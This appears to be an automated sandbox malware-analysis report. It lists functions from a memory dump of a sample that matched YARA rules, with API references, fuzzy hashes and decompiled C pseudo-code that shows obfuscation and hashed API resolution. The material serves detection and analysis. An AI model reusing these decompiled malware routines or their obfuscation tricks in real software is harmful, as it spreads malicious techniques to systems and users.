
Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029A2A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
Instruction ID: 143a7bf3bb937a0808796b936fbf7c5c97e898ea99567b1e7e93baefa4b60ead
Opcode Fuzzy Hash: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
Instruction Fuzzy Hash: 2F90026162100542414071A9C8449064109BBE1252791C121A0D88550DC599887567A5

Uniqueness

Uniqueness Score: -1.00%

Function 01029A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029A5A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
Instruction ID: 3dd63de568deed24a6abd2691d5003fcd145389bfa706a0b607752b1d4141ecd
Opcode Fuzzy Hash: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
Instruction Fuzzy Hash: 1890026123180542D20065A98C14B070109A7D0343F91C115A0544554CC95588716661

Uniqueness

Uniqueness Score: -1.00%

Function 01029540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102954A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
Instruction ID: 835c2fd37c23f9b669f8d3973f5407af7e619d74afedc05e34640e8e4359f62c
Opcode Fuzzy Hash: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
Instruction Fuzzy Hash: 27900265231005030105A5994704507014AA7D5392391C021F1405550CD66188716261

Uniqueness

Uniqueness Score: -1.00%

Function 010295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010295DA

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
Instruction ID: dd7c23fd0dee7fd67c33e8e4a1b251b386cac9f5ec6dd80891fc26a8f500fe13
Opcode Fuzzy Hash: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
Instruction Fuzzy Hash: BC9002A122200503410571998414616410EA7E0242B91C021E1404590DC56588A17265

Uniqueness

Uniqueness Score: -1.00%

Function 01029710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102971A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
Instruction ID: 33ec6b234fbe1335bb6dee9a784c9534ad38a7603769ba20ecf1be3e2738427d
Opcode Fuzzy Hash: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
Instruction Fuzzy Hash: 9A90027122100902D10065D994086460109A7E0342F91D011A5414555EC6A588A17271

Uniqueness

Uniqueness Score: -1.00%

Function 01029780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102978A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
Instruction ID: 60cca144ea13a1c44bf713ae0616f1ca0481dbd98e999abc1decca50abe212cf
Opcode Fuzzy Hash: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
Instruction Fuzzy Hash: 7690026923300502D1807199940860A0109A7D1243FD1D415A0405558CC95588796361

Uniqueness

Uniqueness Score: -1.00%

Function 010297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010297AA

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
Instruction ID: ada6d38c25df5381def28ef2eac5358349ae29dd26a4a19b1704bd73940ff84d
Opcode Fuzzy Hash: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
Instruction Fuzzy Hash: B290026132100503D140719994186064109F7E1342F91D011E0804554CD95588666362

Uniqueness

Uniqueness Score: -1.00%

Function 01029660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102966A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
Instruction ID: 40df6e560410b834ef39bcc67f3213546e1b37eec6f129d181373a5b9c87354c
Opcode Fuzzy Hash: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
Instruction Fuzzy Hash: 2690027122100D02D1807199840464A0109A7D1342FD1C015A0415654DCA558A6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 010296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010296EA

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
Instruction ID: fcf73888d072860bb51d07e3df836e37d8bf1f9d8d878cc2e1b118a7a1a7090e
Opcode Fuzzy Hash: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
Instruction Fuzzy Hash: AB90027122108D02D1106199C40474A0109A7D0342F95C411A4814658DC6D588A17261

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f50be950a21e862b28ca2f4812514f7b183b35d9e9e047d8ddab7a4673c6d2
Instruction ID: 824f618ac45dd5bc7e37706cae1294881ff240cb1c6ae79f8c939ae525b1ba39
Opcode Fuzzy Hash: 85f50be950a21e862b28ca2f4812514f7b183b35d9e9e047d8ddab7a4673c6d2
Instruction Fuzzy Hash: AD210CB2D4021857CB25DA65AD42BEF737CAB54318F04017FE949A3182F6387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00408373, Relevance: 1.7, APIs: 1, Instructions: 181
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408373(void* __eax, signed int __ebx, int __ecx, signed int __edx, int _a8, long _a12, int _a16) {
				intOrPtr _v4;
				int _v8;
				intOrPtr _v16;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v688;
				char _v692;
				intOrPtr _v696;
				intOrPtr __edi;
				int __esi;
				void* __ebp;
				int _t63;
				long _t73;
				intOrPtr* _t75;
				void* _t77;

				asm("in al, 0xd3");
				asm("sti");
				_push(ss);
				asm("sti");
				asm("popfd");
				asm("stc");
				_t63 = __ecx;
				if((__edx & __ebx) != 0) {
					 *((intOrPtr*)(__ebx + 0x30c483f0)) =  *((intOrPtr*)(__ebx + 0x30c483f0)) + __eax;
					if(_t75 != 0) {
						_t73 = _a12;
						_t63 = PostThreadMessageW(_t73, 0x111, 0, 0); // executed
						_t84 = _t63;
						if(_t63 == 0) {
							_t63 =  *_t75(_t73, 0x8003, _t77 + (E0040A460(_t84, 1, 8) & 0x000000ff) - 0x40, _t63);
						}
					}
					return _t63;
				} else {
					_push(0x81ec8b55);
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v16 = 0;
					_v696 = 0;
					 &_v692 = E0041BA40( &_v692, 0, 0x2a4);
					__esi = _a8;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _v4;
					__eax = E004082F0(__ebx, __eflags, _v4,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041B330(__ecx);
					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t15;
					_a8 = 0;
					while(1) {
						__eax = E0040F640(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041A0E0(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041B9C0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041A070(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v136;
											__eax = _a12;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E004198F0(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *(__esi + 0x2e4) = _v132;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E00419930(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041AFD0(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E0041BCB0( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t60 = __eax + 2; // 0x2
													__ecx = __eax + _t60;
													__eax =  &_v656;
													__eax = E00414A20(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}

0x00408373
0x00408377
0x00408378
0x00408379
0x0040837a
0x0040837b
0x0040837c
0x0040837d
0x00408332
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372
0x0040837f
0x0040837f
0x00408380
0x00408381
0x00408383
0x00408389
0x0040838a
0x0040838b
0x0040838c
0x00408394
0x00408397
0x004083a4
0x004083a9
0x004083ac
0x004083b2
0x004083b7
0x004083bf
0x004083ca
0x004083ca
0x004083d1
0x004083e0
0x004083e6
0x004083eb
0x004083f8
0x00408402
0x0040840a
0x00408410
0x00408412
0x00000000
0x00000000
0x00408414
0x0040841c
0x00408436
0x00408436
0x00408439
0x0040843a
0x0040843d
0x00408440
0x00000000
0x00408442
0x00408442
0x00000000
0x00408442
0x0040841e
0x0040841e
0x00408425
0x00000000
0x00408427
0x00408427
0x0040842e
0x00000000
0x00408430
0x00408430
0x00408434
0x00408450
0x00408458
0x00408460
0x00408465
0x0040846d
0x0040846d
0x00408475
0x0040847d
0x0040847f
0x00000000
0x00408481
0x00408481
0x00408487
0x0040848a
0x00408490
0x00408493
0x00408499
0x00408499
0x004084a0
0x004084a2
0x004084a5
0x004084a5
0x004084ac
0x004084af
0x004084b6
0x004084bc
0x004084c2
0x004084c8
0x004084ce
0x004084d4
0x004084da
0x004084df
0x004084e4
0x004084ea
0x004084ec
0x00000000
0x004084f2
0x004084f2
0x004084f5
0x004084f5
0x004084fc
0x00408502
0x00408508
0x0040850e
0x00408514
0x00408520
0x00408528
0x0040852e
0x00408534
0x0040853e
0x00408546
0x0040854c
0x0040854e
0x00000000
0x00408554
0x00408554
0x0040855a
0x0040855a
0x00408560
0x0040856d
0x0040856f
0x00408573
0x00408578
0x0040857b
0x0040857b
0x0040858b
0x00408593
0x0040859b
0x0040859c
0x0040859d
0x0040859e
0x004085a0
0x004085a1
0x004085a1
0x0040854e
0x004084ec
0x00000000
0x00000000
0x00000000
0x00408434
0x0040842e
0x00408425
0x00000000
0x0040841c
0x00408447
0x00408448
0x00408449
0x00408449
0x0040844b
0x0040844c
0x0040844e
0x0040844f
0x0040844f
0x00000000

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ea74b5f1fd3e60aeaee44504f2f3402baf2d0c783d6e2a6d92c0f31b61d5a3c9
Instruction ID: 5be320684be982dd5be809bf41a30e5aca975f799b987cf45196c374d2def9b4
Opcode Fuzzy Hash: ea74b5f1fd3e60aeaee44504f2f3402baf2d0c783d6e2a6d92c0f31b61d5a3c9
Instruction Fuzzy Hash: E661C4B0600309AFDB25DF64DD85BEB77E8EF48704F00446EF949A7281DB74A941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				void* _t15;
				int _t16;
				char* _t20;
				long _t24;
				intOrPtr _t26;
				intOrPtr* _t27;
				void* _t28;

				_v68 = 0;
				E0041BA40( &_v67, 0, 0x3f);
				_t20 =  &_v68;
				E0041C5E0(_t20, 3);
				_t26 = _a4;
				_t27 = _t26 + 0x1c;
				_t14 = E0040ACD0(_t27, _t27,  &_v68); // executed
				_t15 = E00414E20(_t27, _t14, 0, 0, 0xc4e7b6d6);
				 *((intOrPtr*)(__ebx + 0x30c483f0)) =  *((intOrPtr*)(__ebx + 0x30c483f0)) + _t20;
				if(_t27 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t34 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t27(_t24, 0x8003, _t28 + (E0040A460(_t34, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}

0x004082ff
0x00408303
0x00408308
0x0040830e
0x00408313
0x0040831a
0x0040831e
0x0040832e
0x00408332
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5979eb0b3e4b2f2f99457796a9d187242cc49815797ce951ec76352a9c0a08f3
Instruction ID: 9bf814525d72d383b6bb443767b854bd285969e766b1df84f5265e4e126c9636
Opcode Fuzzy Hash: 5979eb0b3e4b2f2f99457796a9d187242cc49815797ce951ec76352a9c0a08f3
Instruction Fuzzy Hash: 2A01F731A803287BE720A6A59C03FFF772CAB40F54F04401EFF04BA1C1E6A8690546FA

Uniqueness

Uniqueness Score: -1.00%

Function 004082B7, Relevance: 1.5, APIs: 1, Instructions: 44
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004082B7(void* __eax, void* __ebx, void* __ecx) {
				void* _t10;
				int _t11;
				void* _t14;
				long _t22;
				void* _t24;
				int _t25;
				void* _t29;

				_t18 = __ecx;
				asm("in eax, dx");
				if(__eax < 0x840527af) {
					_t25 = _t24 + 0x1c;
					__eflags = _t25;
					_t10 = E0040ACD0(_t25, _t25, _t29 - 0x40); // executed
					_t11 = E00414E20(_t25, _t10, 0, 0, 0xc4e7b6d6);
					 *((intOrPtr*)(__ebx + 0x30c483f0)) =  *((intOrPtr*)(__ebx + 0x30c483f0)) + _t18;
					__eflags = _t25;
					if(_t25 != 0) {
						_t22 =  *(_t29 + 0xc);
						_t11 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
						__eflags = _t11;
						if(__eflags == 0) {
							_t11 =  *_t25(_t22, 0x8003, _t29 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t11);
						}
					}
					return _t11;
				} else {
					asm("aas");
					_push(_t24);
					_t14 = E0041B480(__eax, __ecx, 0x11c6f95e);
					return E0041B330(__ecx) + _t14 + 0x1000;
				}
			}

0x004082b7
0x004082bc
0x004082bd
0x0040831a
0x0040831a
0x0040831e
0x0040832e
0x00408332
0x00408338
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372
0x004082bf
0x004082bf
0x004082c0
0x004082c6
0x004082dd
0x004082dd

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7f1dd0263c1def1852f355abbc76d8bd90c83712246cbe1db27db23784762e83
Instruction ID: 9486c3d5ee46871ace2dafdc9ba76dc75e767ca03e3c9aac055c4243c91e1922
Opcode Fuzzy Hash: 7f1dd0263c1def1852f355abbc76d8bd90c83712246cbe1db27db23784762e83
Instruction Fuzzy Hash: 48F0E931A8062436E62056945D43FBF625CABD0F15F15412EFF04F91C1EAFE691506FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D6, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2d9257fdf52b05ac94278bad8b9fd4730d1b4eca5e51c309faf3fe2ee8b3a849
Instruction ID: 4a4bb32f82f9b1e629d90a22692f075a238e95243f20a4eed88629fcf5407140
Opcode Fuzzy Hash: 2d9257fdf52b05ac94278bad8b9fd4730d1b4eca5e51c309faf3fe2ee8b3a849
Instruction Fuzzy Hash: 72F027726002146FD724EFD4DC85EE7B7A9EF89310F1045AAFA4C9B301C531A950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A250, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A250(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB40(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a25f
0x0041a267
0x0041a27d
0x0041a281

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ee3aa041e972e1580d2f30967c3c9a2bcee9683d3d67cd51b15d6bd94af8f81d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: BEE046B1200208ABDB18EF99CC49EE777ADEF88760F018559FE095B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A210, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0041A210(intOrPtr _a4, void* _a8, signed char _a12, void* _a16) {
				void* _v5;
				signed char _t9;
				void* _t11;
				void* _t13;
				void* _t16;

				E0041AB40(_t16, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t13 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9 | 0x00000083);
				_t11 = RtlAllocateHeap(_t13); // executed
				return _t11;
			}

0x0041a227
0x0041a22f
0x0041a232
0x0041a236
0x0041a23b
0x0041a23d
0x0041a241

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 447e7a220df12b1cedfda995ac5eefb5f8fdfd8f8e9865071670fb4112bd08d3
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F8E012B1200208ABDB14EF99CC41EA777ADAF88664F118559BA095B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3B0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A3B0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB40(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a3ca
0x0041a3e0
0x0041a3e4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3E0

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 59391c5e11f167e5dbe23f0656a9380a297fcfa3b65dd95ded7aab8eafd70cc2
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: E3E01AB12002086BDB10DF49CC85EE777ADAF88650F018155BA0957241C934F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A290, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A290(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB40(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a293
0x0041a2aa
0x0041a2b8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0f5b6569f0fd1189fef647496f38c461ee85f3cd89d543d30868c9d99a5dee31
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A5D017726042187BD620EB99CC85FD777ACDF487A0F0180A9BA1D6B242C535BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A283, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A283(intOrPtr _a4, int _a8) {
				signed int _t13;
				signed int _t14;
				void* _t24;

				_t14 = _t13 *  *(_t24 + 0x3a5fbefd);
				gs =  *((intOrPtr*)(_t14 - 0x66));
				asm("clc");
				_t15 = _a4;
				E0041AB40(_t24, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t15 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a283
0x0041a28c
0x0041a28f
0x0041a293
0x0041a2aa
0x0041a2b8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 75b89fe0f6615cbc7119c717c7462a35c62d4160543aaf409624732c35e49f26
Instruction ID: 2f9972bc5181711e0f925a6db8f1358e8404c48fe773edb9fb5b66106bbd618e
Opcode Fuzzy Hash: 75b89fe0f6615cbc7119c717c7462a35c62d4160543aaf409624732c35e49f26
Instruction Fuzzy Hash: CFE08C71210300BBC621DB59CC99FD77BA8AF09760F018498BA591B642D275BB10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0102967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029694

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
Instruction ID: 243ba033f1fa935ed16f2785cc48698f715f6da06f3a2df43106aa4054c7ab8c
Opcode Fuzzy Hash: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
Instruction Fuzzy Hash: 9BB09B719114D5C9D651D7A4460C7177A4477D4745F56C061D1420641B4778C095F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0109B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

read from, xrefs: 0109B4AD, 0109B4B2
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0109B2F3
